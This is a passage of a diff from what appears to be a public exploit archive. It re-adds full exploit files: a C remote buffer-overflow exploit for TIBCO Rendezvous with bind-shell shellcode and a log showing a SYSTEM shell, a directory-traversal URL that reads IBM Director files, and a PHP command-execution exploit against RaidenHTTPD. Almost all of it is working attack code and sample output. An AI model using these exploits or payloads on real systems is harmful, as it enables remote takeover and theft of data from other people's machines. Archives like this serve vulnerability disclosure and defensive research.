and 
up, glibc2.3 and up IA-64/Itanium -- OS/390 V2R6+ USS S/390 compatible OEM hardware -- OS/400 V4R3+ AS/400 -- Solaris 2.7 and up Sparc -- Solaris 2.7, 8, 9 (32-bit only) x86 -- Solaris 2.10 (32- and 64-bit only) x86 -- Tru64 Unix 5.1b Alpha -- UnixWare 7.1 and up x86 -- VMS 7.2 and up -- Alpha -- Windows 2000/XP/2003 Server [MSVC V6.0 and V7.0] x86 - -Usage: -------- - -D:\Programación\tibco>net start rvrd -El servicio de TIB/Rendezvous Routing Communications Daemon está iniciándose. -El servicio de TIB/Rendezvous Routing Communications Daemon se ha iniciado con éxito. - - -D:\Programación\tibco>whoami -REDBULL\atarasco - -D:\Programación\tibco>tibco.exe -e 192.168.0.1 -Tibco RendezVous rvrd, rvsrd remote exploit -Author: Andres Tarasco ( atarasco @ sia.es) -Url: http://www.514.es - -[+] Connection to Tibco HTTP Daemon.. -[+] Daemon Found: rvrd - version: 7.4.11 -[+] Connecting to Tibco SSL Service at port 9003 -[+] Sending Exploit ( 546 bytes) -[+] Ignoring unknown CA... -[+] Sending Exploit ( 546 bytes) -[+] Exploit succesfully sent. Now telnet to port 51477 - -D:\Programación\tibco>nc localhost 51477 -Microsoft Windows XP [Versión 5.1.2600] -(C) Copyright 1985-2001 Microsoft Corp. 
- -C:\>whoami -whoami -NT AUTHORITY\SYSTEM - -C:\> - -*/ - -struct _targets { - char *daemon; - char *name; - char *version; - char *target; - char *header; - char *tail; -} TARGETS[] = { //supported versions -{ "rvrd","Routing Communications Daemon","Generic win32","/add_router","router_name=","&type=+Add+Router+"}, -{ "rvsrd","Routing Communications Daemon","Generic win32","/add_router","router_name=","&type=+Add+Router+"}, -{ "rvsd","Secure Daemon","Generic win32","/sd_add_network_service","network=","&service=&type="}, -{ "rva","Agent for Java","Generic win32","/set_main","edit_listen=7600&edit_service=","&edit_network=&edit_daemon=&submit=Submit"}, -{ "rvcache","Initial Value Cache","Generic win32","/change_services","Service=&Network=&Daemon=","&request_type=Submit"}, -/* more versions here.... */ -}; - -#include -#include -#include -#include -#include -#pragma comment(lib, "ws2_32.lib") -#pragma comment(lib, "wininet.lib") - -unsigned char CALLESP[] ="\xed\x1e\x95\x7c"; //JMP ESP at ntdll.dll - -typedef struct _HTTPData { - unsigned char *buffer; - DWORD dwReturnCode; - DWORD dwBytesRead; - unsigned int DataOffset; -} HTTPData, *PHTTPData; - - -unsigned char jmpBack []= //JMP EBP -500 without nulls - "\x81\xec\xff\xff\xf4\x01" - "\x81\xc4\x0b\xfe\xf4\x01" - "\xff\xe4"; - - -unsigned char shellcode[] = -/* win32_bind - EXITFUNC=seh LPORT=51477 Size=346 Encoder=PexFnstenvSub http://metasploit.com */ -//Restricted chars: 0x00 0x06 0x07 0x08 0x0a 0x0d 0x20 0x22 0x28 0x29 0x30 0x5c 0xcd 0xf2 -"\x33\xc9\x66\x81\xe9\xb0\xff\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73" -"\x13\x90\x90\x47\x87\x83\xeb\xfc\xe2\xf4\x6c\xfa\xac\xca\x78\x69" -"\xb8\x78\x6f\xf0\xcc\xeb\xb4\xb4\xcc\xc2\xac\x1b\x3b\x82\xe8\x91" -"\xa8\x0c\xdf\x88\xcc\xd8\xb0\x91\xac\xce\x1b\xa4\xcc\x86\x7e\xa1" -"\x87\x1e\x3c\x14\x87\xf3\x97\x51\x8d\x8a\x91\x52\xac\x73\xab\xc4" -"\x63\xaf\xe5\x75\xcc\xd8\xb4\x91\xac\xe1\x1b\x9c\x0c\x0c\xcf\x8c" -"\x46\x6c\x93\xbc\xcc\x0e\xfc\xb4\x5b\xe6\x53\xa1\x9c\xe3\x1b\xd3" 
-"\x77\x0c\xd0\x9c\xcc\xf7\x8c\x3d\xcc\xc7\x98\xce\x2f\x09\xde\x9e" -"\xab\xd7\x6f\x46\x21\xd4\xf6\xf8\x74\xb5\xf8\xe7\x34\xb5\xcf\xc4" -"\xb8\x57\xf8\x5b\xaa\x7b\xab\xc0\xb8\x51\xcf\x19\xa2\xe1\x11\x7d" -"\x4f\x85\xc5\xfa\x45\x78\x40\xf8\x9e\x8e\x65\x3d\x10\x78\x46\xc3" -"\x14\xd4\xc3\xc3\x04\xd4\xd3\xc3\xb8\x57\xf6\xf8\x8e\x92\xf6\xc3" -"\xce\x66\x05\xf8\xe3\x9d\xe0\x57\x10\x78\x46\xfa\x57\xd6\xc5\x6f" -"\x97\xef\x34\x3d\x69\x6e\xc7\x6f\x91\xd4\xc5\x6f\x97\xef\x75\xd9" -"\xc1\xce\xc7\x6f\x91\xd7\xc4\xc4\x12\x78\x40\x03\x2f\x60\xe9\x56" -"\x3e\xd0\x6f\x46\x12\x78\x40\xf6\x2d\xe3\xf6\xf8\x24\xea\x19\x75" -"\x2d\xd7\xc9\xb9\x8b\x0e\x77\xfa\x03\x0e\x72\xa1\x87\x74\x3a\x6e" -"\x05\xaa\x6e\xd2\x6b\x14\x1d\xea\x7f\x2c\x3b\x3b\x2f\xf5\x6e\x23" -"\x51\x78\xe5\xd4\xb8\x51\xcb\xc7\x15\xd6\xc1\xc1\x2d\x86\xc1\xc1" -"\x12\xd6\x6f\x40\x2f\x2a\x49\x95\x89\xd4\x6f\x46\x2d\x78\x6f\xa7" -"\xb8\x57\x1b\xc7\xbb\x04\x54\xf4\xb8\x51\xc2\x6f\x97\xef\x60\x1a" -"\x43\xd8\xc3\x6f\x91\x78\x40\x90\x47\x87"; - - -PHTTPData MakeHTTPRequest(char *host, DWORD port, char *metod,char *Url,int ssl, char *buffer); -int GetSSLPort(char *buffer); -void DumpMem(void* string, int length); -/******************************************************************************/ -int GetSSLPort(char *buffer) { - char *p,*q; - p=strstr(buffer,"https://"); - if (p) { - q=strchr(&p[8],':'); - if (q) { - p=strchr(q,'/'); - if (p) { - p[0]='\0';return(atoi(q+1)); - } - } - } - return(-1); -} -/******************************************************************************/ -int GetTibcoDaemon(char *buffer, char *daemon) { - char *p; - char *q; - char name[15]; - int i; - static char SEPARADOR[]="color=\"#242424\">"; //"242424"; - - p=strstr(buffer,SEPARADOR); - if (p) { - p=p+strlen(SEPARADOR)+1; - while(p[0]==' ') p++; - q=strchr(&p[0],'<'); - if (q) { - q[0]='\0'; - printf("[+] Daemon Found: %s - ",p); - strncpy(name,p,14); - q=q+6; - while(q[0]==' ') q++; - p=strchr(&q[0],'<'); - if (p) { - p[0]='\0'; - 
printf("version: %s\n",q); - } - for(i=0;idwReturnCode = (DWORD)atol(bufQuery) ; -// printf("HEADER RESPONSE: %i \n",resultado->dwReturnCode); - - dwLengthBufQuery=sizeof(bufQuery); - bQuery= HttpQueryInfo(hRequest, //petición de tamaño de la petición. - HTTP_QUERY_CONTENT_LENGTH, - bufQuery, - &dwLengthBufQuery, - NULL); - dwFileSize = (DWORD)atol(bufQuery) ; -// printf("Vamos a leer %i bytes de datos\n",dwFileSize); - resultado->dwBytesRead=dwFileSize; - if (dwFileSize==0) { - resultado->buffer=NULL; - InternetCloseHandle(hRequest); - InternetCloseHandle(hConnect); - InternetCloseHandle(hInternetSession); - return(resultado); - } - resultado->buffer= malloc(dwFileSize+1); - bRead = InternetReadFile(hRequest, - resultado->buffer, - dwFileSize, - &dwReadedBytes); - resultado->buffer[resultado->dwBytesRead] = '\0' ; - - InternetCloseHandle(hRequest); - InternetCloseHandle(hConnect); - InternetCloseHandle(hInternetSession); - return(resultado); -} -/****************************************************************************/ -void usage(void) { - printf("Tibco.exe usage: -e parameters\n\n"); - printf("Tibco.exe -e host (buffer overflow)\n"); - exit(1); -} -/****************************************************************************/ - -int main(int argc, char* argv[]) -{ - - DWORD size,i,read,port=7580; - unsigned char *buffer,datos[5000]; - HANDLE f; - WSADATA wsaData; - HTTPData *resultado; - unsigned short bindport; - signed int test; - int dst; - int t[0xff+1]; - - printf("Tibco RendezVous rvrd, rvsrd remote exploit\n"); - printf("Author: Andres Tarasco ( atarasco @ sia.es)\n"); - printf("Url: http://www.514.es\n\n"); - - if (argc==3) { - if (argv[1][0]=='-') { - if (argv[1][1]!='e') { - usage(); - } - } - } else { - usage(); - } - - WSAStartup(MAKEWORD(2, 2), &wsaData); - printf("[+] Connection to Tibco HTTP Daemon..\n"); - - - resultado= MakeHTTPRequest(argv[2], port, "GET","/ ",0, NULL); - if (resultado->dwReturnCode!=200) { - printf("[-] Request Error 
(ErrorCode: %i)\n",resultado->dwReturnCode); - exit(1); - } - dst=GetTibcoDaemon(resultado->buffer,NULL); //Get Version -//m/"#242424">(.*?)
    .*?(.*?)
    / - if (dst==-1) { - printf("[-] Unknown Tibco Daemon (No donut for you)\n"); - exit(1); - } - - //BLINK! BLINK! BLINK! - - resultado= MakeHTTPRequest(argv[2], port, "GET","/daemon_parameters",0, NULL); - port=GetSSLPort(resultado->buffer); - if (!port) { - printf("[-] Unable to gather SSL port\n"); - exit(1); - } - printf("[+] Connecting to Tibco SSL Service at port %i\n",port); - if ((dst==0) || (dst==1) ) { - memset(datos,'\0',sizeof(datos)-1); - - memcpy(datos,TARGETS[dst].header,strlen(TARGETS[dst].header)); - memset(&datos[12],'A',498); - memcpy(&datos[16],shellcode,sizeof(shellcode)-1); - memcpy(&datos[12+498],CALLESP,4); - // memcpy(&datos[12+498],"AAAA",4); - memcpy(&datos[12+498+4],jmpBack,sizeof(jmpBack)); //Jump back ( EBP -500) - memcpy(&datos[12+498+4+sizeof(jmpBack)-1],TARGETS[dst].tail,strlen(TARGETS[dst].tail)); - } -// DumpMem(datos,strlen(datos)); - - resultado= MakeHTTPRequest(argv[2], port, "POST","/add_router",1, datos); - if (resultado->dwReturnCode==200) { - printf("[+] Exploit succesfully sent. 
Now telnet to port 51477\n"); - //printf("resultado: %i\n",resultado->dwReturnCode); - //printf("resultado: %i\n",resultado->dwBytesRead); - //printf("datos: %s\n",resultado->buffer); - //DumpMem(resultado->buffer+300,strlen(resultado->buffer)-300); - - } else { - printf("[-] Exploit Failed\n"); - printf("resultado: %i\n",resultado->dwReturnCode); - //printf("resultado: %i\n",resultado->dwBytesRead); - //printf("datos: %s\n",resultado->buffer); - - } - return(1); -} -//--------------------------------------------------------------------------- - -// milw0rm.com [2006-09-01] +/* +Exploit: TIBCO RendezVous remote buffer overflow exploit for Win32 (public version) +Affected products: Tibco RendezOVous version <=7.4.11 (Multiple Vulnerabilities) +Author: Andres Tarasco Acuña (atarasco @ sia.es ) +Advisory: http://www.514.es +Url: http://www.sia.es +Greetings: Iñaki Lopez and SIA TigerTeam +Status: vulnerability fixed ( Vendor notification + fixes) + +Timeline: +---------------- +Discovered: March 23, 2006 +Exploit coded: March 24, 2006 +Vendor Notified: March 27, 2006 +Vendor patch: May 15, 2006 - Tibco Rendezvous version 7.5 +Public Disclosure: who knows + + +Affected daemons: +----------------------- +- TIB/Rendezvous Routing Communications Daemon (add router buffer overflow) (port 7580) ++ POST /add_router HTTP/1.0 ++ router_name=AAAA..AAA&type=+Add+Router+ + +- TIB/Rendezvous Secure Daemon (port 7580) ++ POST /sd_add_network_service HTTP/1.0 ++ network=AAAA..AAAA&service=&type=Add + +- TIB/Rendezvous Secure Daemon (port 7580) ++ certificate_from_file() lets remote user verify if remote file exists + +- TIB/Rendezvous Secure Daemon (port 7580) ++ Authorized Subjects XSS vulnerability + +- TIB/Rendezvous Secure Routing Daemon (add router buffer overflow) (port 7580) ++ POST /add_router HTTP/1.0 ++ router_name=AAAA..AAA&type=+Add+Router+ + +- TIB/Rendezvous Agent for Java (TIB/Rendezvous Daemon Connection Buffer overflow) (port 7581) + + POST /set_main HTTP/1.0 + + 
edit_listen=7600&edit_service=AAAA..AAAA&edit_network=&edit_daemon=&submit=Submit + +- TIB/Rendezvous Initial Value Cache (port 7581) + + POST /change_services HTTP/1.0 + + Service=&Network=&Daemon=AAA&request_type=Submit + +Affected Operating systems: +------------------------------- +- AIX 5.1 and up RS/6000 +- FreeBSD 4.2 and up x86 +- HP/UX 11.X HPPA +- HP/UX 11.22 and up IA-64/Itanium +- Linux 2.4 kernel: 2.4.20 and up, glibc2.2.4 and up x86 +- Linux 2.4 kernel: 2.4.20 and up, glibc2.3 and up (includes 2.6 kernel) x86 +- Linux 2.4 kernel: 2.4.18 and up, glibc2.3 and up IA-64/Itanium +- OS/390 V2R6+ USS S/390 compatible OEM hardware +- OS/400 V4R3+ AS/400 +- Solaris 2.7 and up Sparc +- Solaris 2.7, 8, 9 (32-bit only) x86 +- Solaris 2.10 (32- and 64-bit only) x86 +- Tru64 Unix 5.1b Alpha +- UnixWare 7.1 and up x86 +- VMS 7.2 and up +- Alpha +- Windows 2000/XP/2003 Server [MSVC V6.0 and V7.0] x86 + +Usage: +------- + +D:\Programación\tibco>net start rvrd +El servicio de TIB/Rendezvous Routing Communications Daemon está iniciándose. +El servicio de TIB/Rendezvous Routing Communications Daemon se ha iniciado con éxito. + + +D:\Programación\tibco>whoami +REDBULL\atarasco + +D:\Programación\tibco>tibco.exe -e 192.168.0.1 +Tibco RendezVous rvrd, rvsrd remote exploit +Author: Andres Tarasco ( atarasco @ sia.es) +Url: http://www.514.es + +[+] Connection to Tibco HTTP Daemon.. +[+] Daemon Found: rvrd - version: 7.4.11 +[+] Connecting to Tibco SSL Service at port 9003 +[+] Sending Exploit ( 546 bytes) +[+] Ignoring unknown CA... +[+] Sending Exploit ( 546 bytes) +[+] Exploit succesfully sent. Now telnet to port 51477 + +D:\Programación\tibco>nc localhost 51477 +Microsoft Windows XP [Versión 5.1.2600] +(C) Copyright 1985-2001 Microsoft Corp. 
+ +C:\>whoami +whoami +NT AUTHORITY\SYSTEM + +C:\> + +*/ + +struct _targets { + char *daemon; + char *name; + char *version; + char *target; + char *header; + char *tail; +} TARGETS[] = { //supported versions +{ "rvrd","Routing Communications Daemon","Generic win32","/add_router","router_name=","&type=+Add+Router+"}, +{ "rvsrd","Routing Communications Daemon","Generic win32","/add_router","router_name=","&type=+Add+Router+"}, +{ "rvsd","Secure Daemon","Generic win32","/sd_add_network_service","network=","&service=&type="}, +{ "rva","Agent for Java","Generic win32","/set_main","edit_listen=7600&edit_service=","&edit_network=&edit_daemon=&submit=Submit"}, +{ "rvcache","Initial Value Cache","Generic win32","/change_services","Service=&Network=&Daemon=","&request_type=Submit"}, +/* more versions here.... */ +}; + +#include +#include +#include +#include +#include +#pragma comment(lib, "ws2_32.lib") +#pragma comment(lib, "wininet.lib") + +unsigned char CALLESP[] ="\xed\x1e\x95\x7c"; //JMP ESP at ntdll.dll + +typedef struct _HTTPData { + unsigned char *buffer; + DWORD dwReturnCode; + DWORD dwBytesRead; + unsigned int DataOffset; +} HTTPData, *PHTTPData; + + +unsigned char jmpBack []= //JMP EBP -500 without nulls + "\x81\xec\xff\xff\xf4\x01" + "\x81\xc4\x0b\xfe\xf4\x01" + "\xff\xe4"; + + +unsigned char shellcode[] = +/* win32_bind - EXITFUNC=seh LPORT=51477 Size=346 Encoder=PexFnstenvSub http://metasploit.com */ +//Restricted chars: 0x00 0x06 0x07 0x08 0x0a 0x0d 0x20 0x22 0x28 0x29 0x30 0x5c 0xcd 0xf2 +"\x33\xc9\x66\x81\xe9\xb0\xff\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73" +"\x13\x90\x90\x47\x87\x83\xeb\xfc\xe2\xf4\x6c\xfa\xac\xca\x78\x69" +"\xb8\x78\x6f\xf0\xcc\xeb\xb4\xb4\xcc\xc2\xac\x1b\x3b\x82\xe8\x91" +"\xa8\x0c\xdf\x88\xcc\xd8\xb0\x91\xac\xce\x1b\xa4\xcc\x86\x7e\xa1" +"\x87\x1e\x3c\x14\x87\xf3\x97\x51\x8d\x8a\x91\x52\xac\x73\xab\xc4" +"\x63\xaf\xe5\x75\xcc\xd8\xb4\x91\xac\xe1\x1b\x9c\x0c\x0c\xcf\x8c" +"\x46\x6c\x93\xbc\xcc\x0e\xfc\xb4\x5b\xe6\x53\xa1\x9c\xe3\x1b\xd3" 
+"\x77\x0c\xd0\x9c\xcc\xf7\x8c\x3d\xcc\xc7\x98\xce\x2f\x09\xde\x9e" +"\xab\xd7\x6f\x46\x21\xd4\xf6\xf8\x74\xb5\xf8\xe7\x34\xb5\xcf\xc4" +"\xb8\x57\xf8\x5b\xaa\x7b\xab\xc0\xb8\x51\xcf\x19\xa2\xe1\x11\x7d" +"\x4f\x85\xc5\xfa\x45\x78\x40\xf8\x9e\x8e\x65\x3d\x10\x78\x46\xc3" +"\x14\xd4\xc3\xc3\x04\xd4\xd3\xc3\xb8\x57\xf6\xf8\x8e\x92\xf6\xc3" +"\xce\x66\x05\xf8\xe3\x9d\xe0\x57\x10\x78\x46\xfa\x57\xd6\xc5\x6f" +"\x97\xef\x34\x3d\x69\x6e\xc7\x6f\x91\xd4\xc5\x6f\x97\xef\x75\xd9" +"\xc1\xce\xc7\x6f\x91\xd7\xc4\xc4\x12\x78\x40\x03\x2f\x60\xe9\x56" +"\x3e\xd0\x6f\x46\x12\x78\x40\xf6\x2d\xe3\xf6\xf8\x24\xea\x19\x75" +"\x2d\xd7\xc9\xb9\x8b\x0e\x77\xfa\x03\x0e\x72\xa1\x87\x74\x3a\x6e" +"\x05\xaa\x6e\xd2\x6b\x14\x1d\xea\x7f\x2c\x3b\x3b\x2f\xf5\x6e\x23" +"\x51\x78\xe5\xd4\xb8\x51\xcb\xc7\x15\xd6\xc1\xc1\x2d\x86\xc1\xc1" +"\x12\xd6\x6f\x40\x2f\x2a\x49\x95\x89\xd4\x6f\x46\x2d\x78\x6f\xa7" +"\xb8\x57\x1b\xc7\xbb\x04\x54\xf4\xb8\x51\xc2\x6f\x97\xef\x60\x1a" +"\x43\xd8\xc3\x6f\x91\x78\x40\x90\x47\x87"; + + +PHTTPData MakeHTTPRequest(char *host, DWORD port, char *metod,char *Url,int ssl, char *buffer); +int GetSSLPort(char *buffer); +void DumpMem(void* string, int length); +/******************************************************************************/ +int GetSSLPort(char *buffer) { + char *p,*q; + p=strstr(buffer,"https://"); + if (p) { + q=strchr(&p[8],':'); + if (q) { + p=strchr(q,'/'); + if (p) { + p[0]='\0';return(atoi(q+1)); + } + } + } + return(-1); +} +/******************************************************************************/ +int GetTibcoDaemon(char *buffer, char *daemon) { + char *p; + char *q; + char name[15]; + int i; + static char SEPARADOR[]="color=\"#242424\">"; //"242424"; + + p=strstr(buffer,SEPARADOR); + if (p) { + p=p+strlen(SEPARADOR)+1; + while(p[0]==' ') p++; + q=strchr(&p[0],'<'); + if (q) { + q[0]='\0'; + printf("[+] Daemon Found: %s - ",p); + strncpy(name,p,14); + q=q+6; + while(q[0]==' ') q++; + p=strchr(&q[0],'<'); + if (p) { + p[0]='\0'; + 
printf("version: %s\n",q); + } + for(i=0;idwReturnCode = (DWORD)atol(bufQuery) ; +// printf("HEADER RESPONSE: %i \n",resultado->dwReturnCode); + + dwLengthBufQuery=sizeof(bufQuery); + bQuery= HttpQueryInfo(hRequest, //petición de tamaño de la petición. + HTTP_QUERY_CONTENT_LENGTH, + bufQuery, + &dwLengthBufQuery, + NULL); + dwFileSize = (DWORD)atol(bufQuery) ; +// printf("Vamos a leer %i bytes de datos\n",dwFileSize); + resultado->dwBytesRead=dwFileSize; + if (dwFileSize==0) { + resultado->buffer=NULL; + InternetCloseHandle(hRequest); + InternetCloseHandle(hConnect); + InternetCloseHandle(hInternetSession); + return(resultado); + } + resultado->buffer= malloc(dwFileSize+1); + bRead = InternetReadFile(hRequest, + resultado->buffer, + dwFileSize, + &dwReadedBytes); + resultado->buffer[resultado->dwBytesRead] = '\0' ; + + InternetCloseHandle(hRequest); + InternetCloseHandle(hConnect); + InternetCloseHandle(hInternetSession); + return(resultado); +} +/****************************************************************************/ +void usage(void) { + printf("Tibco.exe usage: -e parameters\n\n"); + printf("Tibco.exe -e host (buffer overflow)\n"); + exit(1); +} +/****************************************************************************/ + +int main(int argc, char* argv[]) +{ + + DWORD size,i,read,port=7580; + unsigned char *buffer,datos[5000]; + HANDLE f; + WSADATA wsaData; + HTTPData *resultado; + unsigned short bindport; + signed int test; + int dst; + int t[0xff+1]; + + printf("Tibco RendezVous rvrd, rvsrd remote exploit\n"); + printf("Author: Andres Tarasco ( atarasco @ sia.es)\n"); + printf("Url: http://www.514.es\n\n"); + + if (argc==3) { + if (argv[1][0]=='-') { + if (argv[1][1]!='e') { + usage(); + } + } + } else { + usage(); + } + + WSAStartup(MAKEWORD(2, 2), &wsaData); + printf("[+] Connection to Tibco HTTP Daemon..\n"); + + + resultado= MakeHTTPRequest(argv[2], port, "GET","/ ",0, NULL); + if (resultado->dwReturnCode!=200) { + printf("[-] Request Error 
(ErrorCode: %i)\n",resultado->dwReturnCode); + exit(1); + } + dst=GetTibcoDaemon(resultado->buffer,NULL); //Get Version +//m/"#242424">(.*?)
    .*?(.*?)
    / + if (dst==-1) { + printf("[-] Unknown Tibco Daemon (No donut for you)\n"); + exit(1); + } + + //BLINK! BLINK! BLINK! + + resultado= MakeHTTPRequest(argv[2], port, "GET","/daemon_parameters",0, NULL); + port=GetSSLPort(resultado->buffer); + if (!port) { + printf("[-] Unable to gather SSL port\n"); + exit(1); + } + printf("[+] Connecting to Tibco SSL Service at port %i\n",port); + if ((dst==0) || (dst==1) ) { + memset(datos,'\0',sizeof(datos)-1); + + memcpy(datos,TARGETS[dst].header,strlen(TARGETS[dst].header)); + memset(&datos[12],'A',498); + memcpy(&datos[16],shellcode,sizeof(shellcode)-1); + memcpy(&datos[12+498],CALLESP,4); + // memcpy(&datos[12+498],"AAAA",4); + memcpy(&datos[12+498+4],jmpBack,sizeof(jmpBack)); //Jump back ( EBP -500) + memcpy(&datos[12+498+4+sizeof(jmpBack)-1],TARGETS[dst].tail,strlen(TARGETS[dst].tail)); + } +// DumpMem(datos,strlen(datos)); + + resultado= MakeHTTPRequest(argv[2], port, "POST","/add_router",1, datos); + if (resultado->dwReturnCode==200) { + printf("[+] Exploit succesfully sent. Now telnet to port 51477\n"); + //printf("resultado: %i\n",resultado->dwReturnCode); + //printf("resultado: %i\n",resultado->dwBytesRead); + //printf("datos: %s\n",resultado->buffer); + //DumpMem(resultado->buffer+300,strlen(resultado->buffer)-300); + + } else { + printf("[-] Exploit Failed\n"); + printf("resultado: %i\n",resultado->dwReturnCode); + //printf("resultado: %i\n",resultado->dwBytesRead); + //printf("datos: %s\n",resultado->buffer); + + } + return(1); +} +//--------------------------------------------------------------------------- + +// milw0rm.com [2006-09-01] diff --git a/platforms/windows/remote/23.c b/platforms/windows/remote/23.c index aa483fc65..64a7abb22 100755 --- a/platforms/windows/remote/23.c +++ b/platforms/windows/remote/23.c @@ -146,6 +146,6 @@ void usage() printf("\nUsage: \n"); exit(0); } - - -// milw0rm.com [2003-04-30] + + +// milw0rm.com [2003-04-30] 
diff --git a/platforms/windows/remote/232.c b/platforms/windows/remote/232.c index 7a8c0301b..eb7c4565f 100755 --- a/platforms/windows/remote/232.c +++ b/platforms/windows/remote/232.c @@ -552,6 +552,6 @@ int main(int ac, char *av[]) close(t); return 0; -} - -// milw0rm.com [2000-12-19] +} + +// milw0rm.com [2000-12-19] diff --git a/platforms/windows/remote/2320.txt b/platforms/windows/remote/2320.txt index a6f191c6d..cab5303b8 100755 --- a/platforms/windows/remote/2320.txt +++ b/platforms/windows/remote/2320.txt @@ -1,12 +1,12 @@ -There is a vulnerability within the Redirect.bat file on a ibm director -cgi which allows a directory transversal to take place which in turn -exposes most files on the system to be read without authorization. - -http://ip.of.system:411/cgi-bin/Redirect.bat?file=%7C..\..\..\..\..\..\....\..\program%20files\ibm\director\version.key (or insert evil file here) - - -This was fixed in the 5.10 version of ibm director. - --Daniel Clemens - -# milw0rm.com [2006-09-07] +There is a vulnerability within the Redirect.bat file on a ibm director +cgi which allows a directory transversal to take place which in turn +exposes most files on the system to be read without authorization. + +http://ip.of.system:411/cgi-bin/Redirect.bat?file=%7C..\..\..\..\..\..\....\..\program%20files\ibm\director\version.key (or insert evil file here) + + +This was fixed in the 5.10 version of ibm director. + +-Daniel Clemens + +# milw0rm.com [2006-09-07] diff --git a/platforms/windows/remote/2328.php b/platforms/windows/remote/2328.php index 24afec2bd..63f62c0b0 100755 --- a/platforms/windows/remote/2328.php +++ b/platforms/windows/remote/2328.php 
@@ -1,147 +1,147 @@ -#!/usr/bin/php -q -d short_open_tag=on - 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$cmd=""; -$port=80; -$proxy=""; -for ($i=2; $i<$argc; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -if ($proxy=='') {$p="/";} else {$p='http://'.$host.':'.$port."/";} - -$data ="-----------------------------7d529a1d23092a\r\n"; -$data.="Content-Disposition: form-data; name=\"SoftParserFileXml\"; filename=\"suntzu\";\r\n"; -$data.="Content-Type: image/jpeg;\r\n\r\n"; -$data.="\r\n"; -$data.="-----------------------------7d529a1d23092a--\r\n"; -$packet ="POST ".$p."raidenhttpd-admin/slice/check.php HTTP/1.0\r\n"; -$packet.="Host: 
".$host."\r\n"; -$packet.="SUNTZU: $cmd\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Accept: text/plain\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -if (strstr($html,"my_delim")){ -echo "exploit succeeded...\n";$temp=explode("my_delim",$html);die($temp[1]); -} -echo "exploit failed..."; - -?> - -# milw0rm.com [2006-09-08] +#!/usr/bin/php -q -d short_open_tag=on + 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$cmd=""; +$port=80; +$proxy=""; +for ($i=2; $i<$argc; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +if ($proxy=='') {$p="/";} else {$p='http://'.$host.':'.$port."/";} + +$data ="-----------------------------7d529a1d23092a\r\n"; +$data.="Content-Disposition: form-data; name=\"SoftParserFileXml\"; filename=\"suntzu\";\r\n"; +$data.="Content-Type: image/jpeg;\r\n\r\n"; +$data.="\r\n"; +$data.="-----------------------------7d529a1d23092a--\r\n"; +$packet ="POST ".$p."raidenhttpd-admin/slice/check.php HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="SUNTZU: $cmd\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Accept: text/plain\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +if (strstr($html,"my_delim")){ +echo "exploit succeeded...\n";$temp=explode("my_delim",$html);die($temp[1]); +} +echo "exploit failed..."; + +?> + +# milw0rm.com [2006-09-08] diff --git a/platforms/windows/remote/2345.pl 